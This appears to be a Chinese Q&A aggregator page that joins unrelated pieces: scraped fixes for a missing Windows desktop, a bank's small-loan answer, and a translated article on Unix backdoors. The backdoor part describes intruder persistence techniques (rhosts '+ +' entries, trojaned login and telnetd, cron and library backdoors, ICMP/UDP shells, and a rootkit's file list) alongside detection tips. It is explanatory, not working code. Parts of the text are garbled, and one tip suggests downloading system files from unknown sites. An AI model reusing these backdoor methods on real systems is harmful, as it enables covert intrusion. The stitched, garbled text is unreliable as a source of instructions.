A. 电脑开机窗口怎么不见了电脑不显示窗口怎么办
1. 电脑开机右下角运行栏不见了怎么办呢
如果电脑开机右下角运行栏不见了,可能是因为您更改了任务栏的设置或遇到了一纯首些系统或程序错误。以下是一些常见的解决措施:
1. 检查任务栏设置:在Windows操作系统中,您可以通过任务栏设置来控制运行栏的显示。从“设置”中打开“任务栏和开始菜单”选项,检查并启用自定义运行栏(托盘)等选项。
2. 检查系统和程序错误:杀毒软件和防火墙程序等可能会干扰运行栏的正常显示。请关闭这些程序并重新启动电脑,看看是否解决了问题。
3. 重新注册系统文件:做埋数如果系统文件已经损坏,需要重新注册相关系统文件以强制更正。以管理员身份运行CMD窗口,输入sfc/scannow命令并等待其完成扫描,然后重新启动电脑以查看是否解决了问题。
4. 卸载和重液拆新安装程序:如果某个可以导致运行栏出现问题的程序可以卸载并重新安装,可以尝试这种解决方法。
如果以上方法不起作用,建议您寻求更多专业的技术支持或咨询系统维护人员或设备厂商的技术支持。
2. 电脑开机页面软件显示不出来怎么办
1. 为什么我家电脑开机后程序显示不出来 点菜单也也卡住出不来
一、杀毒,修复文件
可能是中毒等原因使你系统文件被破坏或篡改,桌面启动项丢失,建议先杀毒,到朋友的机子上用U 盘拷贝"C:\Documents and Settings\All Users"文件,覆盖你原来的文件,或用系统还原、一键还原修复。
二、鼠标右击桌面空白处-排列图标-显示桌面图标;如不行,用组合键CTRI+ALT+DEL打开任务管理器,看有没有explore.exe这个进程,如果没有,在“新建任务”中输入explorer.exe,如果有,将它去掉,再重新输入xplorer.exe,确定,重启,这时桌面应该就能正常显示。
三、用组策略
运行GPEDIT.msc打开组策略.在用户配置→管理模板-桌面
找到隐藏和禁用桌面所有项目,改为禁用。
四、修改注册表
(1)开始--运行--输入REGEDIT
进入注册表regedit:
HKEY_CURRENT_USER\software\microsoft\windows\current version\polices\exlorer,右边的nodesktop,键值修改为 "0 "
(2)开始-运行-输入“regedit”回车打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,然后查看该分支下的Shell值是否为“Explorer.exe”。如果不是,手动修改为“Explorer.exe”。
五、用记事本
打开“记事本”程序,在其中输入如下内容:
[Shell]
mand=2
IconFile=explorer.exe,3
[Taskbar]
mand=ToggleDesktop
然后把这个文件保存为:“Show Desktop.scf”,必须确认文件名和双引号中的一样。然后把保持的Show Desktop.scf文件复制到:“C:\Documents and Settings\用户名\Application Data\ Microsoft\Inter Explorer\Quick Launch”目录下。其中你需要把“用户名”替换成你需要恢复“显示桌面”按钮的用户名。
六、实在不行,重新安装系统。
2. 电脑屏幕不能完整显示软件界面怎么办
方法一
01
先右击电脑桌面的随便的一个地方,
02
会有一个选项框弹出来,我们选中“屏幕分辨率”这个选项。
03
这时候就会弹出来设置电脑分辨率的窗口。
04
在下方有一个“放大或缩小文本和其他项目”的选框,点击它。
05
之后就进入到设置页面大小的页面中了。
06
选中“较小(s)-100%(默认)”,在前面进行点击,就出现一个小黑点,这就说明已经选中了。
07
然后,再点击界面下方的“应用”。
08
之后会弹出一个窗口,小小的的弹窗。
09
点击第一个“立即注销”就好了。
10
接着,再将电脑重新启动,再次打开软件的时候就能正常显示界面了。
方法二
01
还有就是当我们打开“屏幕分辨率”窗口以后。
02
点开“分辨率”后面的下拉列表。
03
在里面看看,我们现在电脑的分辨率是不是电脑推荐的分辨率。
04
是的话,就用第一种方法。如果不是就设置成电脑推荐的分辨率。
05
设置好,再点击界面下方的 应用。就能正常显示软件界面了。
方法三
01
点击“屏幕分辨率”中的“高级设置”这个选项。
02
之后会弹出一个属性窗口。
03
选中“适配器”这个选项。
04
在下方有“列出所有模式”的选项,点击。
05
去尝试选择其中的一个,再点击下方的确定。看看软件窗口是否正常显示。
如果没有,再次的选择其他的进行尝试。
3. 电脑开机显示应用程序错误,然后不显示桌面怎么回事
1)开机马上按F8不动或没有开机就先按F8不动到高级选项出现在松开手,用上下键选安全模式回车,进入安全模式用软件查杀木马,卸载出事前安装的所有东西,还原一下系统或重装系统(如果可以进入安全模式,说明你安装了不合适的东西,将出事前下载的不合适东西全部卸载,还有就是你中了木马,用软件查杀木马,如果不可以,还原系统或重装,如果可以进入正常模式,在正常模式也是按照上面的方法做)。
2)如果上面的方法不能解决,先软后硬,重新安装操作系统,不要安装软件、补丁、驱动等,看看开机还有问题吗?如果没有在逐步的安装驱动、补丁、软件,找出不合适的东西就不要安装了。
请注意:如果还原系统或重装后,安装驱动、补丁、软件等东西时,一定要将影响你这次出事的东西不要在安装上去了,否则就白还原或重装了。
3)硬件方面,如硬盘、内存、显卡、主板等是否出现问题,如果是硬件问题引起的,建议检修一下去。
4)有问题请您追问我。
4. 电脑开机无法显示页面怎么办
当显示器黑屏没有图像显示时(不过目前市面上的显示器在主机没有信号送来时,屏幕上会显示器"没有信号线连接"),首先检查主机电源是否插接良好,电源的风扇是否转动?主机面板上电源指示灯、硬盘指示灯是闪否亮?因为若主机电源不工作或主板没有供电时,显示器在没有接收到信号时,当然就不会有图像显示的。
2.再检查显示器的电源是否插接良好?如果您的显示器的电源开关是轻触开关时,当你给显示器加电时,应该会听到轻微的"辟啪"声,这时可判断显示器的开关电源电路良好。再 显示器的电源开关是否已经开启?显示器的电源指示灯是否亮?当用手靠近显示器屏幕并慢慢移动是否有"咝咝"的声音,同时手上的汗毛有被吸起的感觉,这在检查显示器高压电路是否正常工作了。
3.如果确定显示器已经加电了,且有高压产生时,继续检查显示器的数据线接头与显卡的信号输出接口是否接触良好?是否有松动?再拔下插头检查一下,D型接口中是否有弯曲或断针或者有大量污垢。这是许多用户经常遇到的问题,在连接D型插口时,用力不均匀,或忘记拧紧接口的固定螺丝,使接口松动造成接触不良,或因安装时方法不当或用力过大,使D型接口内有断针或弯针,以致造成接触不良。
注意:显示器的的数据线插头的15针可能有缺针,如4,9,11针,这时正常的,千万不要人为的用其他金属丝来补充这些缺针位,以免造成其他故障。
4.打开机箱检查显示器卡安装是否正确?与主板插槽是否接触良好?显卡或插槽是否因使用时间太长而积尘太多,以至造成接触不良?显卡上的芯片是否有烧焦、开裂的痕迹。当因显卡原因导致黑屏时,计算机开机自检时即有一短四长的"嘀嘀"声提示。安装显示卡时,要用手握住显示卡上半部分,均匀用力插入卡槽中,使显卡的固定螺丝口与主机箱的螺丝口吻合。未插正时不要强行固定,造成显卡扭曲。如果确认安装正确时,可以取下显卡用酒精棉球擦拭一下插脚的金手指或者换一个插槽(只能对于PCI显卡)安装。如果还不行,只能换一块好的显卡一试下。
如果还不行,在确定显卡完好时,还要考虑显卡与主板的兼容性。最好查一下相关的资料或问一下网友。
5.检查其他的板卡(包括声卡、解压卡、视频捕捉卡)与主板的插槽接触是否良好?注意检查硬盘的数据线与硬盘的电源线接法是否正确?更换其他板卡的插槽,清洗插脚。这一点许多人往往容易忽视。一般认为,计算机黑屏是显示器和显卡问题,与其他设备无关。实际上,因为声卡等设备的安装不正确,导致系
统初使化难以完成,特别是硬盘的数据线与硬盘电源线插错,容易造成无显示的故障。
6.检查内存条与主板的接触是否良好?把内存条重新插拔一次或者换个插槽试试,或者更换新的内存条。如果内存条出现问题,计算机在启动时,会有连续急促的"嘀嘀"声。提示音会因为主板不同而不同。
7.检查CPU与主板上的CPU座接触是否良好?因搬动或其他因素,使CPU与SLOT1插口或SOCKE370插座接触不良。最好用手按一按CPU或取下CPU再重新安装一次。
8.检查CPU外频,倍频,内存的频率等的跳线或CMOS中的设置是否正确。对照主板说明书,逐一检查相关跳线,顺序为"CPU外频跳线-CPU倍频跳线-内存频率跳线"。
9.检查CPU的电压是否设置恰当。 设置CPU电压跳线时要小心,一定要与CPU的工作电压相符。八和九这两步对于一些组装机或喜欢超频的用户在出现黑屏时要仔细检查。
10.检查CMOS参数设置是否正确。如果您的电脑装有两个显卡,你在CMOS里设置的是第一个初始化PCI显卡,而你的唯一的显示器接在AGP显卡上,当然显示器是不会亮的。
11.检查主机和显示器所要求的工作环境是否符合?工作电压是否正常,环境温度是不是过高等。除了按上述步骤进行检查外,还可以根据计算机的工作状况来快速定位,如在开启主机电源后,可听见"嘀"的一声表示计算机自检完成,如果此时硬盘指示灯不停地闪烁,则应在第二步至第四步检查。
12.如果显示器在计算机启动过程中有内容显示,只是在加载WIN98的画面后出现黑屏时,这就只是WIN98系统软件方面的问题了,
上述的检查方法是基于显示器本身无电气故障,即开启主机电源后显示器的电源指示灯由绿变黄但显示器黑屏没有图像显示。如果使用上述步骤显示器仍然无显示,应请专业人员维修
5
5. 电脑开机后不显示windows系统桌面怎么办
电脑开机后不显示桌面的解决办法。
1.电脑开机后不显示桌面一般都是由于病毒或者系统文件缺失导致的,问题知道了之后,那我们需要做的就是杀毒和系统文件修复。
2.桌面,图标都不见了,那我们如何杀毒和系统修复呢,同时按“ctrl+alt+delete”,启动任务管理器,在进程里找下“explorer.exe”这个进程,如果没有,说明该进程没有启用,基本上可以肯定是电脑病毒引起的,在任务栏的左上方找到“文件”—“新建任务”—输入“explorer.exe”—回车,桌面又出现了吧?这时候把杀毒软件更新,然后全盘杀毒,杀毒完成后,再使用360急救箱全盘扫描修复系统,然后再重启电脑。问题解决了吧?
3.如果在打开任务管理器后,发现explorer.exe该进程在,但是电脑还是不显示桌面,那么把该进程关闭掉(右键,选择“结束进程”),然后再点击“文件”—“新建任务”—输入“explorer.exe”—回车,桌面应该能正常使用了,之后的操作同上。
电脑开机后不显示桌面是常见的电脑问题之一,我之所以“中枪”是因为误用了中毒的U盘,所以大家在电脑的正常使用过程中,要注意防毒,尽量不去打开未知的网站,使用未知的外设,要定期杀毒,这样才能保证电脑的正常,高效的运行。
6. 我电脑一开机桌面东西显示不出来
分析:无法正常进入系统桌面,一般是因为软件或硬件故障导致的,原因很多且很复杂,有可能是系统文件损坏,也可能是病毒感染,也可能是后台自启动程序过多或安全软件安装有多个造成系统假死,也可能是内存、硬盘或主板出现问题。
建议:按从易到难的原则逐一排查,推荐重装系统,这是最简单快捷的方法,如果重装系统成功也能排除硬件问题的可能。
1.重启电脑,如果能够正常进入系统,说明上次不正常只是偶尔的程序或系统运行错误,无关紧要。
2.如果频繁无法正常进入系统,则开机后马上按F8,看能否进入安全模式或最后一次配置正确模式,如能则进入后退出,再重启就应当能进入正常模式。如有安全软件,可在安全模式下使用360安全卫士加360杀毒或者金山毒霸等等其它安全软件进行全盘木马、病毒查杀。
3.如果不能,重启后按F11,看有没有一键GHOST,有则一键还原(以前要进行过一键备份)。
4.如果没有一键还原,则使用系统U盘重装系统。插入U盘后开机连按DEL键(笔记本一般为F2或根据屏幕底行提示字符)进入CMOS,进入BOOT选项卡设置USB磁盘为第一启动项。重启进入U盘启动菜单,选择克隆安装,再按提示操作即可。
系统U盘制作及重装系统的操作步骤为:
1).制作启动U盘:到实体店买个4-8G的U盘(可以要求老板帮你制作成系统U盘即可省略以下步骤),上网搜索下载老毛桃或大白菜等等启动U盘制作工具,将U盘插入电脑运行此软件制作成启动U盘。
2).复制系统文件:上网到系统之家网站下载WINXP或WIN7等操作系统的GHO文件,复制到U盘。
3).设置U盘为第一启动磁盘:开机按DEL键(笔记本一般为F2或其它)进入BIOS设置界面,进入BOOT选项卡设置USB磁盘为第一启动项(注:部分电脑需要在此时插入U盘进行识别才能设置)。
4).U盘启动并重装系统:插入U盘启动电脑,进入U盘启动界面按提示利用下载来的GHO文件进行克隆安装。
7. 启动主机后,那两项菜单栏显示不出,系统恢复不了,怎么办
找到一个与你本机系统相同的另一个系统(可以找你朋友的机子),从C盘中把BOOT.INI拷贝出来(打开C盘-工具-文件夹选项,选择查看选项卡,找到“隐藏受保护的操作系统文件”,把勾取消,还有下面的“显示所有文件和文件夹”选定它。再看C盘,就能找到BOOT.INI了)。
然后进WIN PE,把刚才的那个文件复制到你的电脑中,然后重启。
可以用超级兔子,把启动倒计时的时间调长一点。
8. 电脑开机后显示没有开机程序怎么办
电脑开机后会显示桌面,不显示桌面的原因有设置原因、系统本身原因和病毒破坏原因。
方法一:设置原因的解决办法 1、开机后如果不显示桌面的图标,你就在桌面上点击右键,查看---显示桌面图标。这样你的桌面上的图标就会出现了。
桌面功能也就正常了。 2、如果你的问题是不显示图标也不显示任务栏的话,你就按住键盘上的esc、shift、ctrl这三个键,这三个键要同时按。
这时候系统没问题的话应该会出现任务管理器。 3、点击任务管理器的左上角的应用程序选项。
4、在应用程序选项中点击程序掸搐侧诽乇赌岔涩唱绩右下角的新任务按钮。 5、在创建新任务的输入框中输入“explorer”,然后点击确定。
6、如果没有其他原因,此时应该会出现桌面以及任务栏。 7、如果依然不出现桌面图标及任务栏,请参看下面的解决办法。
方法二:病毒原因的解决办法 1、如果通过上述设置的方法不能奏效,那就有可能是病毒的原因致使开机不显示桌面。方法是你重新开机,然后一直不停地按键盘上的F8键进入安全模式。
2、此时已经进入安全模式,你选择第项进入安全模式。 3、如果是病毒的原因,进入安全模式之后应该会出现界面,因为病毒文件无法在安全模式下运行。
4、然后打开你电脑上安装的杀毒软件,有些软件在安全模式下不能工作,但是一些装机必备的安全软件可以在安全模式下工作,你打开之后进行杀毒。 5、杀毒完成后重新启动电脑,如果是病毒的原因,应该能够出现桌面。
如果依然不出现桌面,那就是系统本身的原因了,有可能是病毒破坏了系统文件,而不能使电脑开机进入正常的桌面。 方法三:系统本身的原因的解决办法 1、如果上述方法不能奏效,那一定就是系统本身的原因了。
出现了这种状况是每个人都不想的,但是出现了就得解决。如果你是个有心人,以前曾经备份了系统,那现在就可以非常方便的进行系统还原,把电脑还原到以前的正常的状态下了。
还原的方法有以下几种: 2、还原软件的还原:一般在开机时不停地按上下键然后选择进入还原程序开始还原。还原后自动重启进入桌面。
3、系统自身的还原,开机按F8进入安全模式之后进行系统的还原。 选择进入还原选项 选择还原点 4、重新安装操作系统。
9. 电脑开机后显示不出桌面图标
1、首先右击桌面选排列图标/勾选显示桌面图标。
2、如果故障依旧,打开任务管理器(按下“Ctrl+Alt+Del”组合键即可打开),点击“文件”→“新建任务”,在打开的“创建新任务”对话框中输入“explorer”,单击“确定”按钮后,稍等一下就可以见到桌面图标了。
3、如果故障依旧,按Windows键+R打开运行窗口,运行输入regedit回车打开注册表编辑器,定位到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon],然后查看在右侧的Shell值是否为“Explorer.exe”。如果不是,请手动修改为“Explorer.exe”。双击Shell,在打开的对话框中的数值数据中输入Explorer.exe按确定,重启电脑即可(如果右侧没有Shell,在右面右击空白处选新建/字符串,在数值名称添入“Shell”,在双击它在打开的对话框中的数值数据中输入Explorer.exe按确定重启电脑即可。)。
4、如果故障依旧,可能在你的C:\Windows目录中的“explorer.exe”进程文件受损,请到网上下载“explorer.exe”进程文件,下载后,将它放到你的C:\Windows目录中(如果你的电脑无法下载请用别的电脑下载或在别的电脑上将C:\Windows目录中的“explorer.exe”进程文件用U盘复制下来,开机按F8进入安全模式中将“explorer.exe”进程文件,它放到你的C:\Windows目录中即可。
5、如果还是不行,下载Win清理助手查杀木马,还原系统或重装。
如果是开机不能操作是死机了,重启一下电脑试试,还是不行开机按F8进入安全模式还原一下系统或重装(你断开网线开机试试,如果没有问题了就是开机联网慢引起的,设置固定的IP试试)。
有时中马、系统出现故障都会如此,还有就是开机连网引起的,总之出事前你是怎么操作的?
3. 电脑不显示窗口怎么办
电脑开机后会显示桌面,不显示桌面的原因有设置原因、系统本身原因和病毒破坏原因。
方法一:设置原因的解决办法
1、开机后如果不显示桌面的图标,你就在桌面上点击右键,查看---显示桌面图标。这样你的桌面上的图标就会出现了。桌面功能也就正常了。
电脑开机后不显示桌面怎么办
2、如果你的问题是不显示图标也不显示任务栏的话,你就按住键盘上的esc、shift、ctrl这三个键,这三个键要同时按。这时候系统没问题的话应该会出现任务管理器。
电脑开机后不显示桌面怎么办1
3、点击任务管理器的左上角的应用程序选项。
电脑开机后不显示桌面怎么办2
4、在应用程序选项中点击程序右下角的新任务按钮。
5、在创建新任务的输入框中输入“explorer”,然后点击确定。
6、如果没有其他原因,此时应该会出现桌面以及任务栏。
7、如果依然不出现桌面图标及任务栏,请参看下面的解决办法。
方法二:病毒原因的解决办法
1、如果通过上述设置的方法不能奏效,那就有可能是病毒的原因致使开机不显示桌面。方法是你重新开机,然后一直不停地按键盘上的F8键进入安全模式。
电脑开机后不显示桌面怎么办3
2、此时已经进入安全模式,你选择第项进入安全模式。
电脑开机后不显示桌面怎么办4
3、如果是病毒的原因,进入安全模式之后应该会出现界面,因为病毒文件无法在安全模式下运行。
4、然后打开你电脑上安装的杀毒软件,有些软件在安全模式下不能工作,但是一些装机必备的安全软件可以在安全模式下工作,你打开之后进行杀毒。
360安全卫士系列软件最新版本下载
360安全卫士
立即下载
电脑开机后不显示桌面怎么办5
5、杀毒完成后重新启动电脑,如果是病毒的原因,应该能够出现桌面。如果依然不出现桌面,那就是系统本身的原因了,有可能是病毒破坏了系统文件,而不能使电脑开机进入正常的桌面。
方法三:系统本身的原因的解决办法
1、如果上述方法不能奏效,那一定就是系统本身的原因了。出现了这种状况是每个人都不想的,但是出现了就得解决。如果你是个有心人,以前曾经备份了系统,那现在就可以非常方便的进行系统还原,把电脑还原到以前的正常的状态下了。还原的方法有以下几种:
2、还原软件的还原:一般在开机时不停地按上下键然后选择进入还原程序开始还原。还原后自动重启进入桌面。
电脑开机后不显示桌面怎么办6
3、系统自身的还原,开机按F8进入安全模式之后进行系统的还原。
电脑开机后不显示桌面怎么办7
电脑开机后不显示桌面怎么办8
选择进入还原选项
选择还原点
4、重新安装操作系统。
4. 开机就只有屏幕没有图标,有任务栏,点什么软件应用都不显示窗口怎么办你先试一下命令,不行的话重新装一个系统。1.首先使用组合键“ctrl键+alt键+delete键”调出“任务管理器”2.点击“文件”选择“新建任务(运行)”3.在打开的后面输入“explorer”或者“explorer.exe”点击确定即可;4.这样就可以看到进程已经在任务管理器中正常运行了,桌面图标也正常了。1、开始→运行,在命令框中输入REGSVR32 /n /i:u shell32 然后回车,片刻后会弹出“shell32中的DllInstall成功”对话框,显示桌面按钮就能立刻的回复啦!这个方法也是比较简单的一种。2、右键桌面,选择排列图标—显示桌面图标。如果丢失了我的电脑、网上邻居、回收站、InternetExplorer等桌面图标,右键桌面,属性-桌面-自定义桌面,将丢失的那几个图标打上勾就行啦。3、如果你是关闭一个进程而导致桌面图标不见了,你就打开任务管理器,在新建任务里面输入“EXPLORER.EXE”就行了,这个进程就是显示桌面图标的4、重启-先试试任务管理器重装系统要么就是你之前点击过病毒(潜在的无提示)或者其他网站。---只能重装系统了。之前也遇到过,让程序员检查也找不到原因--重装系统了。
B. 小额贷款需要哪些条件
如需申请小额现金贷款,招商银行有开展闪电贷业务,目前可通过手机银行申请或查看是否获得申请资格。
1、闪电贷放款后会发放现金在指定账户,资金只能用于正常大宗消费、转账,不得投资、流入股市、房产等方向。
2、若持有招行储蓄卡,可登录手机银行后点击“我的→全部→借钱→闪电贷”即可申请闪电贷。您的具体额度将根据您在招行的业务情况进行核定,申请成功即可查看。
3、闪电贷贷款品种不同额度规定也不同,一般授信额度最高不超过30万,最终以放款页面显示为准。若您已获得闪电贷资格,可登录招商银行手机银行APP或网上银行的“闪电贷”模块查询您的最高申请金额,单笔提款金额最低1000元,最高不超过额度金额,并需为1000的整数倍。
4、闪电贷额度内申请借钱放款有两种:
(1)15分钟 放款 5-10分钟内自动审批,通过后立即放款,并短信告知结果
(2)T+1日放款T+1日内会有电核电话来电核实,确认信息后安排放款。如果主动联系3次都没接听,则申请失败,需重新申请。
温馨提示:①若5-10分钟内没有自动放款,正常就是要等待电话审核。审批进度无法直接查询,具体以审批结果为准。
②闪电贷建额时会在征信上有条查询记录。如果您只是建额成功、但未提款:在征信中不会有额度记录;后续每提款一笔,在征信中才会有一笔的贷款记录。
(应答时间:2021年9月9日,最新业务变动请以招行官网公布为准。)
温馨提示:如后续有任何疑问,欢迎随时联系招行APP@您的贴心客服哦~
C. 什么是后门程序
分类: 电脑/网络 >> 反病毒
解析:
当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能。当然,程序员一般不会把后门记入软件的说明文档,因此用户通常无法了解后门的存在。
/按照正常操作程序,在软件交付用户之前,程序员应该去掉软件模块中的后门,但是,由于程序员的疏忽,或者故意将其留在程序中以便日后可以对此程序进行隐蔽的访问,方便测试或维护已完成的程序等种种原因,实际上并未去掉。
这样,后门就可能被程序的作者所秘密使用,也可能被少数别有用心的人用穷举搜索法发现利用。
cache./c?word=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=%3A%2Exiaom%2E/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=
什么是后门?
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门.本文将讨论许多常见的后门及其检测方法. 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门. 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵. 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法.
大多数入侵者的后门实现以下二到三个目的:
即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入. 使再次侵入被发现的可能性减至最低.大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线. 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器. 这也不会引起管理员的注意. 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门.
密码破解后门
这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门. 这就是破解口令薄弱的帐号. 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门. 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些. 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号.因而管理员很难确定查封哪个帐号.
Rhosts + + 后门
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.
校验和及时间戳后门
早期,许多入侵者用自己的trojan程序替代二进制文件. 系统管理员便依*时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序. 入侵者又发展了使trojan文件和原文件时间戳同步的新技术. 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间. 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间. sum程序是基于CRC校验, 很容易
骗过.入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序. MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过.
Login后门
在Unix里,login程序通常用来对tel来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露.入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.
Teld后门
当用户tel到系统, 监听端口的id服务接受连接随后递给in.teld,由它运行login.一些入侵者知道管理员会检查login是否被修改, 就着手修改in.teld.在in.teld内部有一些对用户信息的检验, 比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell .
服务后门
几乎所有网络服务曾被入侵者作过后门. finger, rsh, rexec, rlogin, ftp, 甚至id等等的作了的版本随处多是. 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问.这些程序有时用刺娲□?ucp这样不用的服务,或者被加入id.conf作为一个新的服务.管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验.
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行. 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问. 也可以查看cronjob中经常运行的合法程序,同时置入后门.
库后门
几乎所有的UNIX系统使用共享库. 共享库用于相同函数的重用而减少代码长度. 一些入侵者在象crypt.c和_crypt.c这些函数里作了后门. 象login.c这样的程序调用了crypt(),当使用后门口令时产生一个shell. 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数.而且许多管理员并不会检查库是否被做了后门.对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验. 有一种办法是入侵者对open()和文件访问函数做后门. 后门函数读原文件但执行trojan后门程序. 所以 当MD5读这些文件时,校验和一切正常. 但当系统运行时将执行trojan版本的. 即使trojan库本身也可躲过MD5校验. 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行.静态连接程序不会使用trojan共享库.
内核后门
内核是Unix工作的核心. 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广.
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现. 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等. 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","","fsck"以隐匿特定的目录和文件.在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区. 因此入侵者只能用特别的工具访问这些隐藏的文件. 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在.
Boot块后门
在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变. Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区.
隐匿进程后门
入侵者通常想隐匿他们运行的程序. 这样的程序一般是口令破解程序和监听程序 (sniffer).有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名. 可以将sniffer程序改名类似in.syslog再执行. 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名. 可以修改库函数致使
"ps"不能显示所有进程. 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现. 使用这个技术的一个后门例子是amod.tar.gz :
star.niimm.spb.su/~maillist/bugtraq.1/0777
也可以修改内核隐匿进程.
Rootkit
最流行的后门安装包之一是rootkit. 它很容易用web搜索器找到.从Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ether sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - bee root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified stat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.
网络通行后门
入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行. 这些网络通行后门有时允许入侵者通过防火墙进行访问. 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文.
TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用stat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的.
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以stat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙.
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.
加密连接
管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了.
Windows NT
由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了tel守护程序. 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Neork Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此处该如何翻译? :(
解决
当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.
评估
